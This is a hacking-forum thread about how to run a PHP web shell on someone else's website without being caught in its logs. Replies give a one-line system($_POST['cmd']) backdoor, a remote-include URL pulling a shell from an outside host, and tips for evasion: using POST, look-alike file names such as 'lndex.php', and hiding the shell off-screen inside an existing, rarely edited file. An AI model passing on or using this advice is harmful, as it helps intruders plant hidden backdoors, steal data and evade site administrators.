Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

PHP Shell Question...


Zer0Man's Avatar
Greyhat in Training
0 0

Hey all, If I was to use a PHP Shell on a website does anything show up in the websites logs, for example where the PHP Shell is being hosted?

Thanks in advance, Zer0Man


ghost's Avatar
0 0

Well if you upload a shell onto their site, it will log the fact that your IP accessed the page (along with all the GET vars, which will look really suspicious).

EDIT: The location of a remote shell will still be logged, like /index.php?page=http://site.com/shell.txt


ghost's Avatar
0 0

to reduce the amount of logs, u can try to include a script which backdoor another php script on the site. I mean like:

<?php system($_POST['cmd']) ?>

or something,

then u can call the script with the post parameters, and these normally dont get logged (only that they are a post request not what was posted).

Then u only have one log of including the script which writed it to a script.

(hope i was clear ):P


Mr_Cheese's Avatar
0 1

as mentioned above, if your shell uses GET variables which all public shells do… then yes they will easily be found and detected in logs.. along with your IP.

if your shell uses POST, then all that will be logged is: shell.php and your IP. but if you call the shell … "company.php" or "lndex.php" (small L).. then it wont be so suspisous and likely to go unnoticed.. unless ofcourse the site the shell is on uses custom coded virus/shell scanners… which to be honest is unlikely.


ghost's Avatar
0 0

Mr_Cheese wrote: as mentioned above, if your shell uses GET variables which all public shells do… then yes they will easily be found and detected in logs.. along with your IP.

if your shell uses POST, then all that will be logged is: shell.php and your IP. but if you call the shell … "company.php" or "lndex.php" (small L).. then it wont be so suspisous and likely to go unnoticed.. unless ofcourse the site the shell is on uses custom coded virus/shell scanners… which to be honest is unlikely.

unlikely, but not unheard of. It's common for sys admins to create programs that will alert them if the user that apache runs on runs any commands that aren't whitelisted. And, it's possible to log POST variables, just not practical. Something to keep in mind.

Better than creating a new file (lindex.php), which works (and that's a good file name, btw), it's probably better to edit an existing file you know never gets updated. To do this, check out the 'last updated' date (tools->page info, there's a javascript function, but I'm too lazy to look it up) and use common sense. For example, here I would go with exclusive membership, tshirts, or something similar. Then pick and inconspicuous place for the shell. For example, echo "Assume that this line is longer than 80 characters (standard terminal size"; if($_POST['cmd']) system($_POST['cmd']); echo " And the echo command continues here And here";

And way, the web master doesn't see a new file he knows doesn't exist, but doesn't find you shell until your done with it because you will have already used the shell to gain access to a better account or to get the data you need before he updates that file.